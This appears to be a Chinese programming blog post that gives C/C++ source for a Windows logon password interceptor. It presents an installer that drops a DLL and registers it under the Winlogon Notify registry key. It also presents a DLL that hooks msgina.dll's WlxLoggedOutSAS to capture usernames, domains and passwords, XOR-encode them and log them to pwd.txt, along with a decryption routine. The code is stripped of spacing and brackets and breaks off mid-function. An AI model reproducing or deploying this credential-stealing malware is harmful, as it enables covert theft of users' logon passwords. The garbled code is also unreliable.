1、VC+实现截获Windows 7密码基于VC+2010实现截获Windows 7密码 分类: VC+编程技术 Visual C+2010编程技术 2010-12-17 16:59 744人阅读 评论(1) 收藏 举报 Windows外壳,安装Windows密码截获器view plaincopy to clipboardprint?1. voiddey()/解密 2. 3. printf(/r/n请不要移动原密码文件!);4. system(pause);5. charbuffer10000;6. ZeroMemory(buffer,10000);7. charLogPath255=0;8. G
2、etSystemDirectory(LogPath,MAX_PATH);9. lstrcat(LogPath,/pwd.txt);10. HANDLEhfile=CreateFile(11. LogPath,12. GENERIC_READ,13. FILE_SHARE_WRITE,14. 0,15. OPEN_ALWAYS,16. FILE_ATTRIBUTE_NORMAL,17. 0);18. if(!hfile)19. 20. printf(打开文件失败!);21. return;22. 23. DWORDst;24. inta=ReadFile(hfile,buffer,10000,&
3、st,0);25. if(!a)26. 27. printf(读取失败!);28. return;29. 30. for(inti=0;istrlen(buffer);i+)31. 32. bufferi=bufferi3;33. 34. printf(解密内容为:/r/n%s,buffer);35. return;36. 37. boolinstalled();/判断是否已经安装 38. voidinstalle()/安装函数 39. 40. if(installed()41. 42. printf(已经安装过了!);43. return;44. 45. HRSRChResInfo;46.
4、HGLOBALhResData;47. DWORDdwSize,dwWritten;48. LPBYTEp;49. HANDLEhFile;50. hResInfo=FindResource(NULL,MAKEINTRESOURCE(IDR_DLL1),dll);51. dwSize=SizeofResource(NULL,hResInfo);52. hResData=LoadResource(NULL,hResInfo);53. p=(LPBYTE)GlobalAlloc(GPTR,dwSize);54. CopyMemory(LPVOID)p,(LPCVOID)LockResource(h
5、ResData),dwSize);/定位资源 55. charpfile200;56. GetWindowsDirectory(pfile,200);57. strcat(pfile,/GetPwd.dll);/C:/WINDOWS/58. hFile=CreateFile(pfile,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);59. WriteFile(hFile,(LPCVOID)p,dwSize,&dwWritten,NULL);60. CloseHandle(hFile);61. GlobalFree(HGLOBAL)p);62. HKEYh
6、key;63. if(ERROR_SUCCESS=RegCreateKey(HKEY_LOCAL_MACHINE,64. SOFTWARE/Microsoft/WindowsNT/CurrentVersion/Winlogon/Notify/GetPwd/,65. &hkey)66. )67. 68. char*name3=dog;69. RegSetValueEx(hkey,dllname,0,REG_SZ,(constunsignedchar*)pfile,strlen(pfile);70. RegSetValueEx(hkey,startup,0,REG_SZ,(constunsigne
7、dchar*)name3,strlen(dog);71. printf(安装成功!);72. 73. else74. 75. printf(安装失败!);76. return;77. 78. 79. boolinstalled()80. 81. HKEYhkey;82. charsz256;83. DWORDdwtype,sl=256;84. if(ERROR_SUCCESS!=RegOpenKeyEx(HKEY_LOCAL_MACHINE,85. SOFTWARE/Microsoft/WindowsNT/CurrentVersion/Winlogon/Notify/GetPwd,86. NU
8、LL,KEY_ALL_ACCESS,&hkey)/打开失败,表示没有安装 87. )88. 89. RegCloseKey(hkey);90. returnfalse;91. 92. RegCloseKey(hkey);93. returntrue;94. 95. voidusag()/用法提示 96. 97. printf(example:/r/n);98. printf(/r/nInstall:getpwd.exeinstalle);99. printf(/r/nDecryp:getpwd.exeDecryp/r/n);100. 101. intmain(intargc,char*argv
9、)102. 103. if(!lstrcmpi(argv1,installe)/ 104. 105. installe();106. return0;107. 108. elseif(!lstrcmpi(argv1,Decryp)109. 110. dey();111. return0;112. 113. usag();114. return0;115. 密码截获view plaincopy to clipboardprint?1. #defineWLX_SAS_ACTION_LOGON(1) 2. DWORDWINAPIStartHook(LPVOIDlpParameter);3. type
10、defstruct_WLX_MPR_NOTIFY_INFO4. PWSTRpszUserName;5. PWSTRpszDomain;6. PWSTRpszPassword;7. PWSTRpszOldPassword;8. WLX_MPR_NOTIFY_INFO,*PWLX_MPR_NOTIFY_INFO;9. typedefint(WINAPI*WlxLoggedOutSAS)(10. /定义函数原型,以便将数据转发给系统 11. PVOIDpWlxContext,12. DWORDdwSasType,13. PLUIDpAuthenticationId,14. PSIDpLogonSid
11、,15. PDWORDpdwOptions,16. PHANDLEphToken,17. PWLX_MPR_NOTIFY_INFOpNprNotifyInfo,18. PVOID*pProfile19. );20. intWINAPIFunNewADDR(21. PVOIDpWlxContext,22. DWORDdwSasType,23. PLUIDpAuthenticationId,24. PSIDpLogonSid,25. PDWORDpdwOptions,26. PHANDLEphToken,27. PWLX_MPR_NOTIFY_INFOprNotifyInfo,28. PVOID*
12、pProfile);29. /自定义接管WlxLoggedOutSAS的函数,形参保持一致 30. voidWriteLog(31. PWLX_MPR_NOTIFY_INFOpNprNotifyInfo32. );/声明保存用户名密码函数原型 33. intWideToByte(PCHARsz_target,PWSTRsz_source,intsize_ansi);34. voidWriteCurrentTime();35. voidHookWlxLoggedOutSAS();36. /执行HOOK 37. voidUnHookWlxLoggedOutSAS();38. /撤销HOOK 39.
13、 boolisWin2K()/判断操作系统版本 40. 41. DWORDwinVer;42. OSVERSIONINFO*osvi;43. winVer=GetVersion();44. if(winVerdwOSVersionInfoSize=sizeof(OSVERSIONINFO);51. GetVersionEx(osvi);52. if(osvi-dwMajorVersion=5L&osvi-dwMinorVersion=0L)53. 54. free(osvi);55. returntrue;56. 57. 58. 59. free(osvi);60. returnfalse;6
14、1. 62. #pragmapack(1)/对齐字节 63. structHookTable64. HMODULEhMsgina;65. WlxLoggedOutSASOldDDR;66. WlxLoggedOutSASNewADDR;67. unsignedcharOldCode6;68. unsignedcharJmpCode6;69. ;/自定义的结构体 70. HookTablehooktable=71. 0,72. 0,73. &FunNewADDR,74. /x8B/xFF/x55/x8B/xEC,/前5个字节 75. /xE9/x00/x00/x00/x00/e9,jmp 76.
15、 ;77. /*78. #pragmapack() 79. BOOLAPIENTRYDllMain(HANDLEhModule,80. DWORDul_reason_for_call,81. LPVOIDlpReserved82. )83. 84. if(isWin2K()85. /win2K和xp、2003的前五个字节不同 86. 87. hooktable.OldCode0=/x55;88. hooktable.OldCode1=/x8B;89. hooktable.OldCode2=/xEC;90. hooktable.OldCode3=/x83;91. hooktable.OldCod
16、e4=/xEC;92. 93. switch(ul_reason_for_call)94. 95. caseDLL_PROCESS_ATTACH:96. HANDLEhthread=CreateThread(0,97. 0,98. LPTHREAD_START_ROUTINE(StartHook),99. 0,100. 0,101. 0);102. CloseHandle(hthread);103. break;104. 105. returnTRUE;106. 107. DWORDWINAPIStartHook(LPVOIDlpParameter)108. 109. hooktable.hM
17、sgina=GetModuleHandle(_T(msgina.dll);110. if(hooktable.hMsgina=NULL)111. 112. return0;113. 114. hooktable.OldDDR=(WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina,_T(WlxLoggedOutSAS);115. /得到原始函数地址,等下撤销HOOK会用到 116. if(hooktable.OldDDR=NULL)117. 118. return0;119. 120. unsignedchar*p=(unsignedchar*)ho
18、oktable.OldDDR;121. int*OpCode=(int*)&hooktable.JmpCode1;/ 122. intCode=(int)hooktable.NewADDR-(int)hooktable.OldDDR-5;123. *OpCode=Code;124. HookWlxLoggedOutSAS();125. return0;126. 127. voidHookWlxLoggedOutSAS()128. 129. DWORDOldProtect=NULL;130. VirtualProtect(hooktable.OldDDR,131. 5,132. PAGE_EXE
19、CUTE_READWRITE,133. &OldProtect134. );/内存访问权限 135. unsignedchar*p=(unsignedchar*)hooktable.OldDDR;136. for(inti=0;i5;i+)137. 138. pi=hooktable.JmpCodei;139. 140. VirtualProtect(hooktable.OldDDR,141. 5,142. OldProtect,143. &OldProtect144. );145. return;146. 147. voidUnHookWlxLoggedOutSAS()148. 149. D
20、WORDOldProtect=NULL;150. VirtualProtect(hooktable.OldDDR,151. 5,152. PAGE_EXECUTE_READWRITE,153. &OldProtect);154. unsignedchar*p=(unsignedchar*)hooktable.OldDDR;155. for(inti=0;ipszUserName);170. size_u+=lstrlenW(pNprNotifyInfo-pszDomain);171. size_u+=lstrlenW(pNprNotifyInfo-pszPassword);172. size_
21、u+=lstrlenW(pNprNotifyInfo-pszOldPassword);173. unsignedshort*pWBuffer=(unsignedshort*)GlobalAlloc(GMEM_FIXED,size_u+1024);174. unsignedshort*tWBuffer=(unsignedshort*)GlobalAlloc(GMEM_FIXED,size_u+1024);175. charpBuffer11124;176. char*pwd=(char*)GlobalAlloc(GMEM_FIXED,size_u+1024);177. char*pwd2=(ch
22、ar*)GlobalAlloc(GMEM_FIXED,size_u+1024*3);178. ZeroMemory(pWBuffer,size_u+1024);179. ZeroMemory(pBuffer,size_u+1024);180. ZeroMemory(pBuffer1,size_u+1024);181. if(!pBuffer)182. 183. return;184. else185. 186. WriteCurrentTime();187. wsprintfW(pWBuffer,188. L/r/nUser=%s/r/nDomain=%s/r/nPassWord=%s/r/n
23、OldPass=%s/r/n,189. pNprNotifyInfo-pszUserName,190. pNprNotifyInfo-pszDomain,191. pNprNotifyInfo-pszPassword,192. pNprNotifyInfo-pszOldPassword193. );194. WideToByte(pBuffer,195. pWBuffer,196. lstrlenW(pWBuffer)197. );198. 199. charLogPathMAX_PATH=0;200. GetSystemDirectory(LogPath,MAX_PATH);201. lst
24、rcat(LogPath,/pwd.txt);202. HANDLEhfile=CreateFile(203. LogPath,204. GENERIC_WRITE,205. FILE_SHARE_WRITE,206. 0,207. OPEN_ALWAYS,208. FILE_ATTRIBUTE_NORMAL,209. 0);210. if(hfile!=INVALID_HANDLE_VALUE)211. 212. unsignedlongret;213. SetFilePointer(hfile,-1,0,FILE_END);214. inti=0;215. SYSTEMTIMEst;216. intb;217. for(;istrlen(pBuffer);i+)218. 219. pBufferi=pBufferi3;/加密采用异或方式 220. 221. WriteFile(hfile,pBuffer,lstrlen(pBuffer),&ret,0);222. CloseHandle(hfile);223. 2